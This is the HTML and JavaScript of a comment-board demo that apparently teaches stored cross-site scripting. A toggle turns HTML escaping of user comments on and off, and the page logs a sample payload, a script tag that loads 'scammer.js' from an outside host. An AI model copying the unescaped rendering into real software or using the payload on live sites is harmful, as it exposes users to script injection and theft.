
<!DOCTYPE html>
<html lang="en">
<head>
    <meta charset="utf-8">
    <meta name="viewport" content="width=device-width, initial-scale=1, shrink-to-fit=no">
    <meta name="description" content="">
    <meta name="author" content="">


    <title>Fixed top navbar example for Bootstrap</title>

    <!-- Material Design for Bootstrap fonts and icons -->
    <!--<link rel="stylesheet" href="https://fonts.googleapis.com/css?family=Roboto:300,400,500,700|Material+Icons">-->

    <!-- Material Design for Bootstrap CSS -->
    <link rel="stylesheet" href="https://unpkg.com/bootstrap-material-design@4.0.0-beta.4/dist/css/bootstrap-material-design.min.css" integrity="sha384-R80DC0KVBO4GSTw+wZ5x2zn2pu4POSErBkf8/fSFhPXHxvHJydT0CSgAP2Yo2r4I" crossorigin="anonymous">


    <style>
        /* Show it is fixed to the top */
        body {
            min-height: 75rem;
            padding-top: 4.5rem;
        }

        body {
            background: #eee;
        }
        .lbl {
            position: relative;
            display: block;
            height: 20px;
            width: 44px;
            background: #898989;
            border-radius: 100px;
            cursor: pointer;
            transition: all 0.3s ease;
        }
        .lbl:after {
            position: absolute;
            left: -2px;
            top: -3px;
            display: block;
            width: 26px;
            height: 26px;
            border-radius: 100px;
            background: #fff;
            box-shadow: 0px 3px 3px rgba(0,0,0,0.05);
            content: '';
            transition: all 0.3s ease;
        }
        .lbl:active:after {
            transform: scale(1.15, 0.85);
        }
        .cbx:checked ~ label {
            background: #6fbeb5;
        }
        .cbx:checked ~ label:after {
            left: 20px;
            background: #179588;
        }
        .cbx:disabled ~ label {
            background: #d5d5d5;
            pointer-events: none;
        }
        .cbx:disabled ~ label:after {
            background: #bcbdbc;
        }
        .cntr {
            position: absolute;
            top: 50%;
            left: 50%;
            transform: translate(-50%, -50%);
        }
        .press {
            margin-bottom: 40px;
        }
        .hidden {
            display: none;
        }

    </style>
</head>

<body>

<nav class="navbar navbar-expand-md navbar-dark fixed-top bg-dark container">
    <div class="row">
        <div class="col">
            <a class="navbar-brand" href="#">FD Society Board</a>
        </div>
        <div class="col">
            <button class="navbar-toggler" type="button" data-toggle="collapse" data-target="#navbarCollapse" aria-controls="navbarCollapse" aria-expanded="false" aria-label="Toggle navigation">
                <span class="navbar-toggler-icon"></span>
            </button>
        </div>
        <div class="col">
            <p class="navbar-brand">Enable XSS Protection</p>
        </div>
        <div class="col" style="padding-top: 10px">
            <input type="checkbox" id="toggle" class="cbx hidden"/>
            <label for="toggle" class="lbl"></label>
        </div>
        <div class="col-md-2 offset-md-5">
            <div class="collapse  navbar-collapse" id="navbarCollapse">
                <form class="form-inline mt-2 mt-md-0 ">
                    <a class="btn btn-outline-success my-2 my-sm-0" href="index.html">Logout</a>
                </form>
            </div>
        </div>
    </div>
</nav>

<div class="container" style="margin-top: 50px">


        <div class="card">
            <div class="card-body">
                <form>
                    <div class="form-group">
                        <label for="comment">Comment</label>
                        <textarea class="form-control" id="comment" rows="3"></textarea>
                    </div>

                    <input type="button" class="btn btn-primary" value="Submit" id="commentBtn">

                </form>
            </div>
        </div>
</div>
<br>
<div id="content" class="container">

</div>


<!-- Bootstrap core JavaScript
================================================== -->
<!-- Placed at the end of the document so the pages load faster -->
<!-- jQuery first, then Popper.js, then Bootstrap JS -->
<script src="lib.js"></script>
<script
        src="https://code.jquery.com/jquery-3.2.1.min.js"
        integrity="sha256-hwg4gsxgFZhOsEEamdOYGBf13FyQuiTwlAQgxVSNgt4="
        crossorigin="anonymous"></script>
<script src="https://unpkg.com/popper.js@1.12.6/dist/umd/popper.js" integrity="sha384-fA23ZRQ3G/J53mElWqVJEGJzU0sTs+SvzG8fXVWP+kJQ1lwFAOkcUOysnlKJC33U" crossorigin="anonymous"></script>
<script src="https://unpkg.com/bootstrap-material-design@4.0.0-beta.4/dist/js/bootstrap-material-design.js" integrity="sha384-3xciOSDAlaXneEmyOo0ME/2grfpqzhhTcM4cE32Ce9+8DW/04AGoTACzQpphYGYe" crossorigin="anonymous"></script>
<script>
    var template = `
        <div class="card">
          <div class="card-body">
            <h4 class="card-title">Comment#\${this.id}</h4>
            <h6 class="card-subtitle mb-2 text-muted">\${this.username}</h6>
            <p class="card-text">\${this.comment}</p>
            <button type="button" onclick="deleteComment(\${this.id})" class="btn btn-primary btn-sm">Delete</button>
          </div>
        </div>
        <br>
    `;

    let authData = JSON.parse(window.localStorage.getItem("authData"));

    const server = "https://snickdx.me:3001";

    console.log('XSS CODE: <script src="https://snickdx.me/xss/scammer.js"><\/script>');

//    if(token === null)window.location.href ="index.html";

    function loadData(){
	    Lib.ajaxGet(`${server}/comments`).then(comments=>{
		    comments = JSON.parse(comments);
		    $("#content").html("");
		    comments.reverse().forEach(comment=>{

			    $("#content").append(Lib.makeHTML(comment, template))
		    })
	    });
    }

    loadData();

    var entityMap = {
	    '&': '&amp;',
	    '<': '&lt;',
	    '>': '&gt;',
	    '"': '&quot;',
	    "'": '&#39;',
	    '/': '&#x2F;',
	    '`': '&#x60;',
	    '=': '&#x3D;'
    };

    function escapeHtml (string) {
	    let sanitized = String(string).replace(/[&<>"'`=\/]/g, function (s) {
		    return entityMap[s];
	    });
	    console.log("Comment: ", string, " Sanitized to: ", sanitized);
	    return sanitized;

    }

    function deleteComment(id){
	    let settings = {
		    "async": true,
		    "crossDomain": true,
		    "url": "https://snickdx.me:3001/comments/"+id,
		    "method": "DELETE",
		    "headers": {
			    "cache-control": "no-cache"
		    }
	    };

	    $.ajax(settings).done(function (response) {
		    console.log(response);
		    loadData();
	    });


    }

    let protection = false;


    $("#commentBtn").click(function(){
    	let comment = protection ? escapeHtml($("#comment").val()) : $("#comment").val();

	    $.ajax(
		    {
			    "async": true,
			    "crossDomain": true,
			    "url": `${server}/comments`,
			    "method": "POST",
			    "headers": {
				    "content-type": "application/json",
				    "cache-control": "no-cache"
			    },
			    "processData": false,
			    data: JSON.stringify({ username: authData.username, comment: comment})
		    })
		    .done(function( msg ) {
			    $("#comment").val('');
			    loadData();

		    }).fail(function(msg){
	    });
    });


    $("#toggle").click(function(){
    	protection = !protection;
    	console.log("XSS Protection ",protection);
    });

</script>

</body>
</html>
